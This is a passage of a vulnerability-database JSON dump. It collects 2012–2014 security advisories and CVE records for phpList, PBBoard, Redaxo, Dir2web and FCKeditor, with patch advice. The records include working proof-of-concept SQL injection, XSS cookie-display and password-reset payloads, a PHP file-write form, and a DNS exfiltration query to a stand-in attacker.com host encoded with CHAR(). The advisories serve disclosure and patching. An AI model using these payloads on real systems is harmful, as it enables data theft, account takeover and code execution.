address for `version()` (or any other sensitive output from the database) subdomain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))) -- \n \nSecond alternative is to exploit this SQL injection vulnerability also via XSRF vector, but to perform XSS attack against logged-in administrator. 
The following PoC code will simply display administrator cookies: \nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62) -- \n\n", "edition": 2, "cvss3": {}, "published": "2012-07-11T00:00:00", "type": "htbridge", "title": "Multiple Vulnerabilities in phpList", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3952", "CVE-2012-3953"], "modified": "2012-08-06T00:00:00", "id": "HTB23100", "href": "https://www.htbridge.com/advisory/HTB23100", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P/"}}, {"lastseen": "2020-12-24T11:33:53", "description": "High-Tech Bridge Security Research Lab has discovered vulnerability in Redaxo, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n1) Cross-Site Scripting (XSS) in Redaxo: CVE-2012-3869 \n1.1 Input passed via the \"subpage\" GET parameter to /redaxo/index.php (when \"page\" is set to \"user\" or \"template\") is not properly sanitised before being returned to the user. \nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website. 
\nThe following PoC (Proof of Concept) demonstrates the vulnerability: \nhttp://[host]/redaxo/index.php?page=user&subpage=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \nhttp://[host]/redaxo/index.php?page=template&subpage=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\n", "edition": 2, "published": "2012-07-04T00:00:00", "type": "htbridge", "title": "Cross-Site Scripting (XSS) in Redaxo", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3869"], "modified": "2012-07-23T00:00:00", "id": "HTB23098", "href": "https://www.htbridge.com/advisory/HTB23098", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:45", "description": "\r\n\r\nAdvisory ID: HTB23101\r\nProduct: PBBoard\r\nVendor: www.pbboard.com\r\nVulnerable Version(s): 2.1.4 and probably prior\r\nTested Version: 2.1.4\r\nVendor Notification: July 18, 2012 \r\nPublic Disclosure: August 8, 2012 \r\nVulnerability Type: SQL Injection [CWE-89], Improper Authentication [CWE-287], Improper Access Control [CWE-284]\r\nCVE References: CVE-2012-4034, CVE-2012-4035, CVE-2012-4036\r\nCVSSv2 Base Scores: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P), 7.6 (AV:N/AC:H/Au:N/C:C/I:C/A:C)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in PBBoard, which can be exploited to perform SQL injection attacks, change password of arbitrary user and create arbitrary files in folder of the vulnerable application.\r\n\r\n\r\n1) Multiple SQL Injections in PBBoard: CVE-2012-4034\r\n\r\n1.1 Input passed via the "username" POST parameter to /index.php (when "id", "member" and "start" parameters are set, and "page" is set to "send") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC (Proof of Concept) demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?id=1&member=1&page=send&start=1" method="post" name="main" id="main">\r\n<input type="hidden" name="username" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n 1.2 Input passed via the "email" POST parameter to /index.php (when "send_active_code" parameter is set, and "page" is set to "forget") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=forget&send_active_code=1" method="post" name="main" id="main">\r\n<input type="hidden" name="email" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n1.3 Input passed via the "password" POST parameter to /index.php (when "password_check" and "id" parameters are set, and "page" 
is set to "forum_archive") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=forum_archive&password_check=1&id=1" method="post" name="main" id="main">\r\n<input type="hidden" name="password" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n1.4 Input passed via the "section" POST parameter to /index.php (when "move" and "subject_id" parameters are set, and "page" is set to "management") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=management&move=1&subject_id=1" method="post" name="main" id="main">\r\n<input type="hidden" name="section" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n1.5 Input passed via the "section_id" POST parameter to /index.php (when "startdeleteposts" and "do_replys" parameters are set, and "page" is set to "managementreply") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=managementreply&startdeleteposts=1&do_replys=1" method="post" name="main" id="main">\r\n<input type="hidden" name="section_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input 
type="hidden" name="check[]" value="1">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n1.6 Input passed via the "member_id" POST parameter to /index.php (when "forget" parameter is set, and "page" is set to "new_password") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=new_password&forget=1" method="post" name="main" id="main">\r\n<input type="hidden" name="member_id" value="1' OR 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2))) -- ">\r\n<input type="hidden" name="new_password" value="1">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n1.7 Input passed via the "subjectid" POST parameter to /index.php (when "start" parameter is set, and "page" is set to "tags") is not properly sanitised before being used in a SQL query.\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code.\r\n\r\nThe following PoC demonstrates the vulnerability:\r\n\r\n\r\n<form action="http://[host]/index.php?page=tags&start=1" method="post" name="main" id="main">\r\n<input type="hidden" name="subjectid" value="' union select '<? php_code ?>',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 INTO OUTFILE '../../../path/to/site/file.php' -- ">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\nSuccessful exploitation of the above-mentioned vulnerabilities (1.1 - 1.7) requires that "magic_quotes_gpc" is set to "off". SQL injection in POST request can be also exploited with a FireFox browser equipped with Tamper Data plugin. 
\r\n\r\n\r\n2) Improper Authentication in PBBoard: CVE-2012-4035\r\n\r\nPBBoard permits to change password of any board member due to absence of any verification of user-supplied "member_id" POST parameter in the password change script.\r\n\r\nThe following PoC changes password for the user with ID=1 (forum administrator):\r\n\r\n\r\n<form action="http://[host]/index.php?page=new_password&forget=1" method="post" name="main" id="main">\r\n<input type="hidden" name="member_id" value="1">\r\n<input type="hidden" name="new_password" value="new_password">\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\n\r\n3) Improper Access Control in PBBoard: CVE-2012-4036\r\n\r\nInput passed via the "xml_name" POST parameter to /admin.php (when "export" and "export_writing" parameters are set, and "page" parameter is set to "addons") is not properly sanitised before being used as a name of a newly created file.\r\n\r\nAn attacker can create an arbitrary .php file and potentially execute arbitrary PHP code on vulnerable system depending on server configuration.\r\n\r\nThe following PoC will create a file located at: http://[host]/addons/file.php that will display result of phpinfo() function execution:\r\n\r\n\r\n<form action="http://[host]/admin.php?page=addons&export=1&export_writing=1&xml_name=file.php" method="post" name="main" id="main">\r\n<input type="hidden" name="context" value='<? phpinfo(); ?>'>\r\n<input type="submit" name="Submit" value="Send"> \r\n</form>\r\n\r\n\r\nSuccessful exploitation of this vulnerability requires administrative privileges, however can be also exploited via CSRF vector (CVE-2012-1216). The CSRF vulnerability has not been patched by the Vendor Notification date. 
\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nApply 5-8-2012 Security Patch\r\n\r\nMore Information:\r\nhttp://www.pbboard.com/forums/t10352.html\r\nhttp://www.pbboard.com/forums/t10353.html\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23101 - https://www.htbridge.com/advisory/HTB23101 - Multiple vulnerabilities in PBBoard.\r\n[2] PBBoard - http://www.pbboard.com - PBBoard is a free flat-forum bulletin board software.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "cvss3": {}, "published": "2012-08-13T00:00:00", "title": "Multiple vulnerabilities in PBBoard", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-4036", "CVE-2012-4034", "CVE-2012-4035", "CVE-2012-1216"], "modified": "2012-08-13T00:00:00", "id": "SECURITYVULNS:DOC:28369", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28369", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:45", "description": "\r\n\r\nAdvisory ID: HTB23100\r\nProduct: phpList\r\nVendor: phpList Ltd\r\nVulnerable Version(s): 2.10.18 and probably prior\r\nTested Version: 2.10.18\r\nVendor Notification: July 11, 2012 \r\nPublic Disclosure: August 8, 2012 \r\nVulnerability Type: Cross-Site Scripting [CWE-79], SQL Injection [CWE-89]\r\nCVE References: CVE-2012-3952, CVE-2012-3953\r\nCVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: Medium \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in phpList, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks against the vulnerable application.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in phpList: CVE-2012-3952\r\n\r\nInput passed via the "unconfirmed" GET parameter to /admin/index.php (when "page" is set to "user") is not properly sanitised before being returned to the user.\r\n\r\nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.\r\n\r\nThe following PoC (Proof 
of Concept) demonstrates the vulnerability:\r\n\r\n\r\nhttp://[host]/admin/?page=user&find=1&unconfirmed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n\r\n\r\n2) SQL Injection in phpList: CVE-2012-3953\r\n\r\nInput passed via the "delete" GET parameter to /admin/index.php (when "page" is set to "editattributes") is not properly sanitised before being used in SQL query.\r\n\r\nThis can be exploited to manipulate SQL queries by injecting arbitrary SQL code. However successful exploitation of this vulnerability requires administrator's privileges. \r\n\r\n\r\nThe following PoC demonstrates vulnerability exploitation under administrator's account:\r\n\r\n\r\nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select version() --\r\n\r\n\r\n\r\nAlternative exploitation of the SQL injection can be performed via XSRF vector and does not require administrative privileges. The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):\r\n\r\n\r\nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))) -- \r\n\r\n\r\n\r\nSecond alternative is to exploit this SQL injection vulnerability also via XSRF vector, but to perform XSS attack against logged-in administrator. 
The following PoC code will simply display administrator cookies:\r\n\r\n\r\nhttp://[host]/admin/?page=editattributes&id=1&delete=1 union select char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62) -- \r\n\r\n\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nUpgrade to phpList 2.10.19\r\n\r\nMore Information:\r\nhttp://www.phplist.com/?lid=579\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23100 - https://www.htbridge.com/advisory/HTB23100 - Cross-Site Scripting (XSS) in phpList.\r\n[2] phpList - http://www.phplist.com - phpList is the world's most popular open source email campaign manager.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. 
The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "cvss3": {}, "published": "2012-08-13T00:00:00", "title": "Multiple Vulnerabilities in phpList", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-3952", "CVE-2012-3953"], "modified": "2012-08-13T00:00:00", "id": "SECURITYVULNS:DOC:28366", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28366", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:45", "description": "\r\n\r\nTitle:\r\n======\r\nDir2web3 Multiple Vulnerabilities\r\n\r\nDate:\r\n=====\r\n05/08/2012\r\n\r\nAuthor:\r\n=======\r\nDaniel Correa (http://www.sinfocol.org/)\r\n\r\nVulnerable software:\r\n====================\r\nDir2web v3.0 (http://www.dir2web.it/)\r\n\r\nCVE:\r\n====\r\nCVE-2012-4069\r\nCVE-2012-4070\r\n\r\nDetails:\r\n========\r\nThere are two vulnerabilities identified on Dir2web v3.0:\r\n\r\nInformation disclosure (CVE-2012-4069):\r\nDatabase folder is public and it is not protected via .htaccess. An attacker\r\ncan download the entire database and look for hidden pages on the website.\r\n\r\nSQL Injection (CVE-2012-4070):\r\nPreg_match function is not enough to protect GET/POST parameters. 
An\r\nattacker\r\ncan easily make a SQL Injection over the application.\r\n\r\nExploit:\r\n========\r\nInformation disclosure:\r\nhttp://site/_dir2web/system/db/website.db\r\n\r\nSQL Injection:\r\nhttp://site/index.php?wpid=homepage&oid=6a303a0aaa' OR id > 0-- -\r\n\r\nPatch:\r\n======\r\nInformation disclosure:\r\nCreate .htaccess file on _dir2web folder with the following content:\r\norder deny,allow\r\ndeny from all\r\n\r\nSQL Injection:\r\nFix the regular expression in dispatcher.php file located on\r\n_dir2web/system/src folder.\r\n\r\nReplace:\r\n'/[a-zA-Z0-9]{10}/'\r\nWith:\r\n'/^[a-zA-Z0-9]{10}$/'\r\n\r\nTimeline:\r\n=========\r\n13/07/2012: Vendor contacted\r\n25/07/2012: CERT contacted\r\n27/07/2012: CVE assigned\r\n05/08/2012: Vulnerability published on Bugtraq\r\n\r\n-- Regards, Daniel Correa\r\n", "edition": 1, "cvss3": {}, "published": "2012-08-13T00:00:00", "title": "Dir2web3 Multiple Vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-4069", "CVE-2012-4070"], "modified": "2012-08-13T00:00:00", "id": "SECURITYVULNS:DOC:28374", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28374", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:45", "bulletinFamily": "software", "cvelist": ["CVE-2012-3869"], "description": "\r\n\r\nAdvisory ID: HTB23098\r\nProduct: Redaxo\r\nVendor: Redaxo team\r\nVulnerable Version(s): 4.4 and probably prior\r\nTested Version: 4.4\r\nVendor Notification: 4 July 2012 \r\nVendor Patch: 23 July 2012 \r\nPublic Disclosure: 25 July 2012 \r\nVulnerability Type: Cross-Site Scripting (XSS)\r\nCVE Reference: CVE-2012-3869\r\nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)\r\nSolution Status: Fixed by Vendor\r\nRisk Level: Medium \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab has discovered vulnerability in Redaxo, which can be exploited to perform Cross-Site Scripting (XSS) attacks.\r\n\r\n\r\n1) Cross-Site Scripting (XSS) in Redaxo: CVE-2012-3869\r\n\r\n1.1 Input passed via the "subpage" GET parameter to /redaxo/index.php (when "page" is set to "user" or "template") is not properly sanitised before being returned to the user.\r\n\r\nThis can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.\r\n\r\nThe following PoC (Proof of Concept) demonstrate the vulnerability:\r\n\r\n\r\nhttp://[host]/redaxo/index.php?page=user&subpage=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\nhttp://[host]/redaxo/index.php?page=template&subpage=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nApply vendor's patch: http://www.redaxo.org/files/sicherheitsupdate_4_3_und_4_4.zip\r\nMore Information:\r\nhttp://www.redaxo.org/de/download/sicherheitshinweise/\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nReferences:\r\n\r\n[1] High-Tech Bridge Advisory HTB23098 - https://www.htbridge.com/advisory/HTB23098 - Cross-Site Scripting (XSS) in Redaxo.\r\n[2] Redaxo - http://www.redaxo.org/ - PHP MySQL Open Source Content Management System.\r\n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures.\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nDisclaimer: The information provided in this 
Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.\r\n", "edition": 1, "modified": "2012-08-13T00:00:00", "published": "2012-08-13T00:00:00", "id": "SECURITYVULNS:DOC:28378", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28378", "title": "Cross-Site Scripting (XSS) in Redaxo", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:45", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2522-1 security@debian.org\r\nhttp://www.debian.org/security/ Yves-Alexis Perez\r\nAugust 05, 2012 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : fckeditor\r\nVulnerability : cross site scripting\r\nProblem type : remote\r\nDebian-specific: no\r\nCVE ID : CVE-2012-4000\r\nDebian Bug : 683418\r\n\r\nEmilio Pinna discovered a cross site scripting vulnerability in the\r\nspellchecker.php page of FCKeditor, a popular html/text editor for the web.\r\n\r\nFor the stable distribution (squeeze), this problem has been fixed in\r\nversion 1:2.6.6-1squeeze1.\r\n\r\nFor the testing distribution (wheezy), this problem has been fixed in\r\nversion 1:2.6.6-3.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 1:2.6.6-3.\r\n\r\nWe recommend that you upgrade your fckeditor packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n", 
"edition": 1, "cvss3": {}, "published": "2012-08-13T00:00:00", "title": "[SECURITY] [DSA 2522-1] fckeditor security update", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-4000"], "modified": "2012-08-13T00:00:00", "id": "SECURITYVULNS:DOC:28368", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28368", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\nClass\t\tCross-Site Scripting\r\nRemote\tYes\r\nPublished\t2nd June 2014\r\nCredit\t\tRobin Bailey of Dionach (vulns@dionach.com)\r\nVulnerable\tFCKeditor <= 2.6.10\r\n\r\nFCKeditor is prone to a reflected cross-site scripting (XSS) vulnerability due to inadequately sanitised user input. An attacker may leverage this issue to run JavaScript in the context of a victim's browser.\r\n\r\nFCKeditor 2.6.10 is known to be vulnerable; older versions may also be vulnerable. 
\r\n\r\nNote that this issue is related to CVE-2012-4000, which was a cross-site scripting vulnerability in the values of the textinputs[] array passed to the spellchecker.php page. To resolve this issue the values of this array were encoded with htmlspecialchars() before being output to the page; however the array keys were still echoed unencoded.\r\n\r\nPoC:\r\n\r\nPOST http://[target]/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php\r\ntextinputs[1</script><script>alert(document.cookie);//</script>]=zz\r\n\r\nThe vendor was notified of this issue, and FCKeditor 2.6.11 was released to address this vulnerability. See the following vendor announcement:\r\n\r\nhttp://ckeditor.com/blog/FCKeditor-2.6.11-Released\r\n\r\nTimeline:\r\n\r\n28/05/2014\tVulnerability identified\r\n28/05/2014\tInitial vendor contact\r\n28/05/2014\tVendor response to contact\r\n28/05/2014\tVulnerability disclosed to vendor\r\n29/05/2014\tVendor confirms vulnerability\r\n02/06/2014\tVendor releases patch\r\n02/06/2014\tPublic disclosure of vulnerability\r\n\r\n______________________________________________________________________\r\n\r\nDisclaimer: This e-mail and any attachments are confidential.\r\n\r\nIt may contain privileged information and is intended for the named\r\naddressee(s) only. It must not be distributed without Dionach Ltd consent.\r\nIf you are not the intended recipient, please notify the sender immediately and destroy this e-mail. \r\n\r\nAny unauthorised copying, disclosure or distribution of the material in this e-mail is strictly forbidden. Unless expressly stated, opinions in this e-mail are those of the individual sender, and not of Dionach Ltd.\r\n\r\nDionach Ltd, Greenford House, London Road, Wheatley, Oxford OX33 1JH Company Registration No. 03908168, VAT No. 
GB750661242\r\n\r\n______________________________________________________________________\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-06-14T00:00:00", "title": "FCKedtior 2.6.10 Reflected Cross-Site Scripting (XSS)", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2012-4000"], "modified": "2014-06-14T00:00:00", "id": "SECURITYVULNS:DOC:30848", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30848", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "cve": [{"lastseen": "2022-03-23T12:47:58", "description": "The new_password page in PBBoard 2.1.4 allows remote attackers to change the password of arbitrary user accounts via the member_id and new_password parameters to index.php.", "cvss3": {}, "published": "2012-08-12T00:55:00", "type": "cve", "title": "CVE-2012-4035", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4035"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:pbboard:pbboard:2.1.4"], "id": "CVE-2012-4035", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-4035", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:pbboard:pbboard:2.1.4:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:20", "description": "SQL injection vulnerability in admin/index.php in phpList before 2.10.19 allows remote administrators to execute arbitrary SQL commands via the delete parameter to the editattributes page.", "cvss3": {}, 
"published": "2012-08-12T00:55:00", "type": "cve", "title": "CVE-2012-3953", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-3953"], "modified": "2017-08-29T01:32:00", "cpe": ["cpe:/a:phplist:phplist:2.10.18", "cpe:/a:phplist:phplist:2.10.13", "cpe:/a:phplist:phplist:2.8.2", "cpe:/a:phplist:phplist:2.10.16", "cpe:/a:phplist:phplist:2.10.17", "cpe:/a:phplist:phplist:2.7.2", "cpe:/a:phplist:phplist:2.10.7", "cpe:/a:phplist:phplist:2.10.4", "cpe:/a:phplist:phplist:2.6.5", "cpe:/a:phplist:phplist:2.10.9", "cpe:/a:phplist:phplist:2.10.10", "cpe:/a:phplist:phplist:2.10.12", "cpe:/a:phplist:phplist:2.10.1", "cpe:/a:phplist:phplist:2.10.8", "cpe:/a:phplist:phplist:2.10.14", "cpe:/a:phplist:phplist:2.10.2", "cpe:/a:phplist:phplist:2.10.15", "cpe:/a:phplist:phplist:2.10.5", "cpe:/a:phplist:phplist:2.7.1", "cpe:/a:phplist:phplist:2.10.11", "cpe:/a:phplist:phplist:2.8.7", "cpe:/a:phplist:phplist:2.8.12", "cpe:/a:phplist:phplist:2.10.3"], "id": "CVE-2012-3953", "href": 